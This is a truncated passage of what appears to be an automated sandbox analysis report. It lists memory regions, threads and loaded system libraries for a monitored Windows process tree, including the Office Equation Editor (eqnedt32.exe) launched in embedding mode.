"pagefile_0x0000000001150000" filename = "" Region: id = 2155 start_va = 0x1150000 end_va = 0x115ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Region: id = 2216 start_va = 0x1140000 end_va = 0x114ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Region: id = 2217 start_va = 0x1150000 end_va = 0x115ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Region: id = 2479 start_va = 0x1140000 end_va = 0x114ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Region: id = 2480 start_va = 0x1150000 end_va = 0x115ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Region: id = 4404 start_va = 0x4f10000 end_va = 0x4f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f10000" filename = "" Region: id = 4405 start_va = 0x9f90000 end_va = 0xa08ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f90000" filename = "" Region: id = 4406 start_va = 0xa0c0000 end_va = 0xa0fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a0c0000" filename = "" Region: id = 4407 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 4413 start_va = 0x1140000 end_va = 0x1140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Region: id = 4414 start_va = 0x1140000 end_va = 0x1140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Region: id = 4415 start_va = 0x1140000 end_va = 0x1140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Region: id = 4422 start_va = 0x1140000 end_va = 0x1140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Region: id = 4425 start_va = 0x68000000 end_va = 0x68008fff monitored = 0 entry_point = 0x680015a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Thread: id = 1 os_tid = 0xda8 Thread: id = 2 os_tid = 0xd9c Thread: id = 3 os_tid = 0xd98 Thread: id = 4 os_tid = 0xd90 Thread: id = 5 os_tid = 0xd8c Thread: id = 6 os_tid = 0xd88 Thread: id = 7 os_tid = 0xd84 Thread: id = 8 os_tid = 0xd80 Thread: id = 9 os_tid = 0xd6c Thread: id = 10 os_tid = 0xd68 Thread: id = 11 os_tid = 0xd64 Thread: id = 12 os_tid = 0xd60 Thread: id = 13 os_tid = 0xd20 Thread: id = 14 os_tid = 0xdc0 Thread: id = 32 os_tid = 0xe60 Thread: id = 89 os_tid = 0xe98 Thread: id = 133 os_tid = 0xee0 Thread: id = 136 os_tid = 0xf00 Thread: id = 193 os_tid = 0xf64 Process: id = "2" image_name = "eqnedt32.exe" filename = "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\equation\\eqnedt32.exe" page_root = "0x3b33c000" os_pid = "0xe00" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x248" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Office\\Root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\" -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 507 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 508 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 509 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 510 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 511 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 512 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 513 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 514 start_va = 0x400000 end_va = 0x48dfff monitored = 0 entry_point = 0x44cd40 region_type = mapped_file name = "eqnedt32.exe" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\EQUATION\\eqnedt32.exe" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\equation\\eqnedt32.exe") Region: id = 515 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 516 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 517 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 518 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 519 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 520 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 521 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 522 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 523 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 524 start_va = 0x2e0000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 525 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 526 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 527 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 528 start_va = 0x774c0000 end_va = 0x775defff monitored = 0 entry_point = 0x774d5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 529 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 530 start_va = 0x774c0000 end_va = 0x775defff monitored = 0 entry_point = 0x774d5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 531 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 532 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 533 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 534 start_va = 0x490000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 535 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 536 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 537 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 538 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 539 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 540 start_va = 0x1b0000 end_va = 0x216fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 541 start_va = 0x729b0000 end_va = 0x72b64fff monitored = 0 entry_point = 0x72aa3d5a region_type = mapped_file name = "appvisvsubsystems32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll") Region: id = 542 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 543 start_va = 0x72940000 end_va = 0x729a4fff monitored = 0 entry_point = 0x7295fa6c region_type = mapped_file name = "appvisvstream32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll") Region: id = 544 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 545 start_va = 0x72870000 end_va = 0x7293afff monitored = 0 entry_point = 0x72886a2b region_type = mapped_file name = "c2r32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll") Region: id = 546 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 547 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 548 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 549 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 550 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 551 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 552 start_va = 0x763d0000 end_va = 0x7652bfff monitored = 0 entry_point = 0x7641ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 553 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 554 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 555 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 556 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 557 start_va = 0x755b0000 end_va = 0x761f9fff monitored = 0 entry_point = 0x75631601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 558 start_va = 0x76850000 end_va = 0x768a6fff monitored = 0 entry_point = 0x76869ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 559 start_va = 0x72850000 end_va = 0x72866fff monitored = 0 entry_point = 0x72851c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 560 start_va = 0x744c0000 end_va = 0x744cafff monitored = 0 entry_point = 0x744c1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 561 start_va = 0x75260000 end_va = 0x752e3fff monitored = 0 entry_point = 0x752619a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 562 start_va = 0x220000 end_va = 0x2cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 563 start_va = 0x220000 end_va = 0x23dfff monitored = 0 entry_point = 0x23158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 564 start_va = 0x2c0000 end_va = 0x2cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 565 start_va = 0x6c0000 end_va = 0x847fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 566 start_va = 0x220000 end_va = 0x23dfff monitored = 0 entry_point = 0x23158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 567 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 568 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 569 start_va = 0x220000 end_va = 0x220fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 570 start_va = 0x230000 end_va = 0x230fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 571 start_va = 0x850000 end_va = 0x9d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 572 start_va = 0x9e0000 end_va = 0x1ddffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009e0000" filename = "" Region: id = 573 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 574 start_va = 0x1de0000 end_va = 0x20aefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 575 start_va = 0x240000 end_va = 0x240fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 576 start_va = 0x250000 end_va = 0x256fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 577 start_va = 0x240000 end_va = 0x240fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 578 start_va = 0x250000 end_va = 0x256fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 579 start_va = 0x240000 end_va = 0x240fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 580 start_va = 0x250000 end_va = 0x25dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 581 start_va = 0x6fff0000 end_va = 0x6fffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000006fff0000" filename = "" Region: id = 582 start_va = 0x76ad0000 end_va = 0x76b5efff monitored = 0 entry_point = 0x76ad3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 583 start_va = 0x250000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 584 start_va = 0x490000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 585 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 586 start_va = 0x20b0000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 587 start_va = 0x72f00000 end_va = 0x7313ffff monitored = 0 entry_point = 0x72f066bd region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 588 start_va = 0x3de20000 end_va = 0x3de2dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "eeintl.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\equation\\1033\\eeintl.dll") Region: id = 589 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 590 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 591 start_va = 0x2550000 end_va = 0x258ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 592 start_va = 0x2590000 end_va = 0x266efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 593 start_va = 0x76530000 end_va = 0x765b2fff monitored = 0 entry_point = 0x765323d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 594 start_va = 0x270000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 595 start_va = 0x360000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 596 start_va = 0x2670000 end_va = 0x276ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 597 start_va = 0x2770000 end_va = 0x286ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002770000" filename = "" Region: id = 598 start_va = 0x74190000 end_va = 0x741a6fff monitored = 0 entry_point = 0x74193573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 599 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 600 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 601 start_va = 0x74150000 end_va = 0x7418afff monitored = 0 entry_point = 0x7415128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 602 start_va = 0x742c0000 end_va = 0x742cdfff monitored = 0 entry_point = 0x742c1235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 603 start_va = 0x3a0000 end_va = 0x3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 604 start_va = 0x490000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 605 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 606 start_va = 0x24b0000 end_va = 0x252ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024b0000" filename = "" Region: id = 607 start_va = 0x2870000 end_va = 0x296ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002870000" filename = "" Region: id = 608 start_va = 0x2970000 end_va = 0x2a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002970000" filename = "" Region: id = 609 start_va = 0x2a70000 end_va = 0x2b2ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 610 start_va = 0x2d00000 end_va = 0x2d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 611 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 612 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 613 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 614 start_va = 0x2d40000 end_va = 0x366ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 615 start_va = 0x2b0000 end_va = 0x2b4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 616 start_va = 0x3670000 end_va = 0x3a6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003670000" filename = "" Region: id = 617 start_va = 0x2b30000 end_va = 0x2baffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "~wrf{190c32d0-061d-4fbd-bc5a-b64a94267731}.tmp" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRF{190C32D0-061D-4FBD-BC5A-B64A94267731}.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.word\\~wrf{190c32d0-061d-4fbd-bc5a-b64a94267731}.tmp") Region: id = 618 start_va = 0x2bb0000 end_va = 0x2caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bb0000" filename = "" Region: id = 619 start_va = 0x75470000 end_va = 0x755a5fff monitored = 0 entry_point = 0x75471b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 620 start_va = 0x765c0000 end_va = 0x766b4fff monitored = 0 entry_point = 0x765c1865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 621 start_va = 0x76e50000 end_va = 0x7704afff monitored = 0 entry_point = 0x76e522d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 622 start_va = 0x768b0000 end_va = 0x769d0fff monitored = 0 entry_point = 0x768b158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 623 start_va = 0x766c0000 end_va = 0x766cbfff monitored = 0 entry_point = 0x766c238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 624 start_va = 0x74490000 end_va = 0x744b0fff monitored = 0 entry_point = 0x7449145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 625 start_va = 0x77130000 end_va = 0x77174fff monitored = 0 entry_point = 0x771311e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 626 start_va = 0x74400000 end_va = 0x74408fff monitored = 0 entry_point = 0x74401220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 627 start_va = 0x2d0000 end_va = 0x2d7fff monitored = 0 entry_point = 0x0 